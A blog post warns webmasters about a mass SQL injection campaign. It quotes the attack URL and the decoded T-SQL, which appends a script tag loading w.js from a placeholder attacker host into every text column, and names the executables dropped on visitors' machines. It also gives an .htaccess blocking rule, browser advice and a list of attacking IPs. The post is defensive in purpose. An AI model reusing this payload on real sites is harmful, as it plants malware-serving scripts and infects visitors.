From 11th August, I have received SQL injection attack to my blog on daily bases (each try is 2 consequent attempts). Apprently it has started since 8th of August and not too many blogger/webmasters have realised this. Here a non-technical summary of what’s going on.

What is it?

It is a SQL injection attacking from input URL string. Attacking will run following URL to your site:

;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41---TRUNCATED---43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

Which is a hexed string, translated as:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231or b.xtype=167) OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"&gt;<script src="HACKERS_ADDRESS/w.js"><!--mce:0--></script><!--  '' where '+@C+' not like ''%"--><script src="HACKERS_ADDRESS/w.js"><!--mce:1--></script>&lt; !--''') FETCH NEXT FROM  Table_Cursor INTO
@T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor% AS% CHAR(@)

This script is trying to infect website by executing a query to attach a javascript file from the attacker’s site on to your website. When a browser reached the infected website, the injected javascript will be called and will attempt to download one of the following program onto browser’s computer:

• rondll32.exe
• msyahoo.exe
• wsv.exe
• thunder.exe

No details on what these malicious program does yet, but certainly not something you want. You can check on Internet Storm Center who provided a comprehensive detail on this activity and TrustedSource who also provide a non-technical description on this attack.

I’m a blogger/webmater, How can I prevent it?

The script is not CMS specified and as long as it have no access to your server, exploit attempt will fail on the spot. Thanks to tflight in WordPress forum, you can add following rewrite rules to your .htaccess file to filter out attacking attempts (just in case):

RewriteCond %{QUERY_STRING} ^(.+)declare(.+)$ [NC]
RewriteRule ^.* - [F,L]

If you log your site, now is a time to open it up and take a look see if you are been targeted. Those who own website(s) and do not pay much attention, now is a good time to rethink and look after your visitors.

I’m a browser, How can I prevent it?

The injected javascript detects your browser type to either create an activeX object (if you on IE) or opens a flash file, which both will download the malicious program on to your computer.

If you are using IE 6, for gods sack.. please upgrade to IE 7 or switch to Firefox.
If you are a IE 7 user, make sure your browser setting prevents to execute ActiveX automatically on any site and be suspicious when a random site attempts to run ActiveX.

The best solution I have for Internet browsers, is to use Firefox 3 with No-Script extension on it.

Here’s a list of IP of the foes who tried to attack my blog (so far):
24.253.101.241
60.221.229.53
61.185.148.148
61.18.170.115
61.18.170.227
82.46.210.74
87.206.38.42
190.40.69.44
218.74.194.61
221.207.153.239
220.163.186.17

Ban them at your will.